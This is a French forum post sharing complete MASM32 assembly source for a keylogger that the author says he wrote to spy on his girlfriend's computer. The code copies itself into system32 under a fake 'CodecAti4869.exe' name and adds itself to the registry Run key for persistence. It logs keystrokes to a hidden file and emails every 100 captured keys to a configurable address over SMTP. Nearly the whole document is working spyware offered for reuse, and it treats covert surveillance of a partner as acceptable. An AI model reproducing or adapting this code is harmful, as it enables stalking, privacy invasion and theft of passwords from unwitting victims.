Bonjour a tous!
Ce prog porte bien son nom, je l'ai programmé sans aucune attention de nuire a quelqu'un, c'etais juste pour espionné l'ordi de ma copine.C'est ca d'etre jaloux!
Enfin, je l'ai programmé vite fais! en 3 heure plus precisement,je n'ai pas un niveau elevé en assembleur, et surtous je n'ai pas le temps necessaire...
Alors attention, si vous compiler cette source, si vous etes un debutant surtous.
Le programme ce copie dans la base de registre pour se lancer a chaque demarrage, c'est classique! et se copie dans le repertoire system32.
Le programme capture 100 touches du clavier et l'envoie par l'email..
Il creér des fichier dans system32 aussi!
Bref, il y a des bugs, mais moi il m'as servi.
Depuis, le programme sur l'ordi et desactivé, et je la fais confiance.
J'espere que vous n'utiliserez pas cette source a des actions malveillantes,la source a pour but, de montrer des fonctions interressantes.
Ne soyez pas assisté, comprenez par vous meme.
Bonne prog!!!
Source / Exemple :
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\rand.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
Mys PROTO :DWORD
Defini MACRO Name, Text:VARARG
LOCAL lbl
jmp lbl
Name dd Text,0
lbl:
ENDM
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
.DATA
buffer db "smtp.wanadoo.fr",0
ClassName db "WinClasseAti",0
AppName db "AtiUpdate",0
NbByteWritten dd 0
Demain dd ?
Fiere dd 0
Ordre dd ?
Soleil db "\",0
Ainsi db "CodecAti4869.exe",0
HELO db "EHLO smtp.wanadoo.fr",13 ,10 ,0
MAIL_FROM db "MAIL FROM: <Cequelledi@aol.com>",13 ,10 ,0
RCPT_TO db "RCPT TO: <Email@wanadoo.fr>",13 ,10 ,0 ;<---mettez ici votre E@mail
DONNEES db "DATA",13 ,10 ,0
TEXTE db " ",13 ,10 ,13 ,10 ,0
FIN_DONNEES db ".",13 ,10 ,0
RegistreRun db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
FERME db "QUIT",13 ,10 ,0
wsadata WSADATA <>
sin sockaddr_in <>
Port dd 25
.DATA?
hInstance HINSTANCE ?
CommandLine LPSTR ?
hFile dd ?
Nom db 8 dup(?)
Lettre db 1 dup(?)
Information db 255 dup (?)
sock dd ?
buf db 255 dup (?)
CheminSystem db 256 dup(?)
Regarder db 256 dup(?)
CheminExec db 256 dup(?)
hReg dd ?
ip dd ?
.CODE
start:
invoke GetModuleFileName,0,addr Regarder,sizeof Regarder
invoke GetSystemDirectory,addr CheminSystem,sizeof CheminSystem
invoke lstrcat,addr CheminExec,addr CheminSystem
invoke lstrcat,addr CheminExec,addr Soleil
invoke lstrcat,addr CheminExec,addr Ainsi
invoke CopyFile,addr Regarder,addr CheminExec,0
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg
invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec
invoke RegCloseKey, hReg
INVOKE GetTickCount
INVOKE Randomize,eax
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
;
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess, eax
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInstance
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
invoke CreateWindowEx,NULL, ADDR ClassName, ADDR AppName, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInst, NULL
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
Invoke SetTimer,hWnd,0,100, 0
.if uMsg == WM_TIMER
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg
invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec
invoke RegCloseKey, hReg
invoke InternetGetConnectedState, ADDR Fiere, 0
test eax, eax
jnz @@on_line
jmp @@exit
@@on_line:
Invoke GetAsyncKeyState, VK_A
.if eax != 0
inc Ordre
Defini Def,"A"
invoke lstrcat,addr Information, addr Def
push 0
push offset NbByteWritten
push 1
push offset Def
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_B
.if eax != 0
inc Ordre
Defini Def1,"B"
invoke lstrcat,addr Information, addr Def1
push 0
push offset NbByteWritten
push 1
push offset Def1
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_C
.if eax != 0
inc Ordre
Defini Def2,"C"
invoke lstrcat,addr Information, addr Def2
push 0
push offset NbByteWritten
push 1
push offset Def2
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_D
.if eax != 0
inc Ordre
Defini Def3,"D"
invoke lstrcat,addr Information, addr Def3
push 0
push offset NbByteWritten
push 1
push offset Def3
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_E
.if eax != 0
inc Ordre
Defini Def4,"E"
invoke lstrcat,addr Information, addr Def4
push 0
push offset NbByteWritten
push 1
push offset Def4
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_F
.if eax != 0
inc Ordre
Defini Def5,"F"
invoke lstrcat,addr Information, addr Def5
push 0
push offset NbByteWritten
push 1
push offset Def5
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_G
.if eax != 0
inc Ordre
Defini Def6,"G"
invoke lstrcat,addr Information, addr Def6
push 0
push offset NbByteWritten
push 1
push offset Def6
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_H
.if eax != 0
inc Ordre
Defini Def7,"H"
invoke lstrcat,addr Information, addr Def7
push 0
push offset NbByteWritten
push 1
push offset Def7
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_I
.if eax != 0
inc Ordre
Defini Def8,"I"
invoke lstrcat,addr Information, addr Def8
push 0
push offset NbByteWritten
push 1
push offset Def8
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_J
.if eax != 0
inc Ordre
Defini Def9,"J"
invoke lstrcat,addr Information, addr Def9
push 0
push offset NbByteWritten
push 1
push offset Def9
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_K
.if eax != 0
inc Ordre
Defini Def10,"K"
invoke lstrcat,addr Information, addr Def10
push 0
push offset NbByteWritten
push 1
push offset Def10
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_L
.if eax != 0
inc Ordre
Defini Def11,"L"
invoke lstrcat,addr Information, addr Def11
push 0
push offset NbByteWritten
push 1
push offset Def11
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_M
.if eax != 0
inc Ordre
Defini Def12,"M"
invoke lstrcat,addr Information, addr Def12
push 0
push offset NbByteWritten
push 1
push offset Def12
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_N
.if eax != 0
inc Ordre
Defini Def13,"N"
invoke lstrcat,addr Information, addr Def13
push 0
push offset NbByteWritten
push 1
push offset Def13
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_O
.if eax != 0
inc Ordre
Defini Def14,"O"
invoke lstrcat,addr Information, addr Def14
push 0
push offset NbByteWritten
push 1
push offset Def14
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_P
.if eax != 0
inc Ordre
Defini Def15,"P"
invoke lstrcat,addr Information, addr Def15
push 0
push offset NbByteWritten
push 1
push offset Def15
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_Q
.if eax != 0
inc Ordre
Defini Def16,"Q"
invoke lstrcat,addr Information, addr Def16
push 0
push offset NbByteWritten
push 1
push offset Def16
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_R
.if eax != 0
inc Ordre
Defini Def17,"R"
invoke lstrcat,addr Information, addr Def17
push 0
push offset NbByteWritten
push 1
push offset Def17
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_S
.if eax != 0
inc Ordre
Defini Def18,"S"
invoke lstrcat,addr Information, addr Def18
push 0
push offset NbByteWritten
push 1
push offset Def18
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_T
.if eax != 0
inc Ordre
Defini Def19,"T"
invoke lstrcat,addr Information, addr Def19
push 0
push offset NbByteWritten
push 1
push offset Def19
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_U
.if eax != 0
inc Ordre
Defini Def20,"U"
invoke lstrcat,addr Information, addr Def20
push 0
push offset NbByteWritten
push 1
push offset Def20
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_V
.if eax != 0
inc Ordre
Defini Def21,"V"
invoke lstrcat,addr Information, addr Def21
push 0
push offset NbByteWritten
push 1
push offset Def21
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_W
.if eax != 0
inc Ordre
Defini Def22,"W"
invoke lstrcat,addr Information, addr Def22
push 0
push offset NbByteWritten
push 1
push offset Def22
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_X
.if eax != 0
inc Ordre
Defini Def23,"X"
invoke lstrcat,addr Information, addr Def23
push 0
push offset NbByteWritten
push 1
push offset Def23
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_Y
.if eax != 0
inc Ordre
Defini Def24,"Y"
invoke lstrcat,addr Information, addr Def24
push 0
push offset NbByteWritten
push 1
push offset Def24
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_Z
.if eax != 0
inc Ordre
Defini Def25,"Z"
invoke lstrcat,addr Information, addr Def25
push 0
push offset NbByteWritten
push 1
push offset Def25
push hFile
call WriteFile
.endif
Invoke GetAsyncKeyState, VK_SPACE
.if eax != 0
inc Ordre
Defini Def26," "
invoke lstrcat,addr Information, addr Def26
push 0
push offset NbByteWritten
push 1
push offset Def26
push hFile
call WriteFile
.endif
.if Ordre == 100
mov Ordre,0
invoke WSAStartup,101h,addr wsadata ;initialise le socket
invoke socket,AF_INET,SOCK_STREAM,IPPROTO_IP
mov sock,eax
mov sin.sin_family,AF_INET ;famille de socket
invoke htons,Port ;port 25
mov sin.sin_port,ax
invoke inet_addr,addr buffer
mov ip,eax
.if eax==INADDR_NONE
invoke gethostbyname,addr buffer
.if eax!=NULL
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke inet_ntoa,eax
.else
jmp endit
.endif
.else
invoke gethostbyaddr,addr ip,4,2
.if eax == 0
jmp endit
.endif
mov eax,[eax] .endif
endit:
invoke inet_addr, eax ;ip du smtp
mov sin.sin_addr, eax
invoke connect, sock, addr sin ,sizeof sin ;on se connecte
invoke recv, sock, addr buf, sizeof buf, 0 ;et affiche la reponse
; HELO SERVER
invoke Mys, addr HELO ;envoit HELO smtp.infonie.be
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr HELO, MB_OK
; MAIL TO:
invoke Mys, addr MAIL_FROM ;envoit MAIL FROM:
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr MAIL_FROM, MB_OK
; RCPT TO:
invoke Mys, addr RCPT_TO ;envoit RCPT TO:
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr RCPT_TO, MB_OK
; DATA
invoke Mys, addr DONNEES ;envoit DATA
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr DONNEES, MB_OK
invoke lstrcat,addr Information, addr TEXTE
invoke Mys, addr Information ;envoit le text
; DATA
invoke Mys, addr FIN_DONNEES ;envoit .
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr FIN_DONNEES, MB_OK
; DATA
invoke Mys, addr FERME ;envoit QUIT
invoke recv, sock, addr buf, sizeof buf, 0
;invoke MessageBox,0,addr buf, addr FERME, MB_OK
mov Information,0
invoke closesocket,sock ;ferme le socket et quit
.endif
@@exit:
.elseif uMsg == WM_CREATE
INVOKE GetTickCount
INVOKE Randomize,eax
mov Ordre,0
mov Demain,0
GenereNom:
INVOKE Rand,26
add al,97
mov Lettre,al
invoke lstrcat,addr Nom, addr Lettre
inc Demain
cmp Demain,7
jng GenereNom
invoke lstrcat,addr CheminSystem, addr Soleil
invoke lstrcat,addr CheminSystem, addr Nom
invoke CreateFile,ADDR CheminSystem,GENERIC_WRITE,FILE_SHARE_READ,
0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
.endif
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
WndProc endp
Mys proc SendStr : DWORD
push edi
mov edi, SendStr
.WHILE TRUE
.BREAK .IF (byte ptr [edi] == 0 )
invoke send, sock, edi, 1, 0
inc edi
.ENDW
pop edi
ret
Mys endp
end start
Vous n'êtes pas encore membre ?
inscrivez-vous, c'est gratuit et ça prend moins d'une minute !
Les membres obtiennent plus de réponses que les utilisateurs anonymes.
Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.
Le fait d'être membre vous permet d'avoir des options supplémentaires.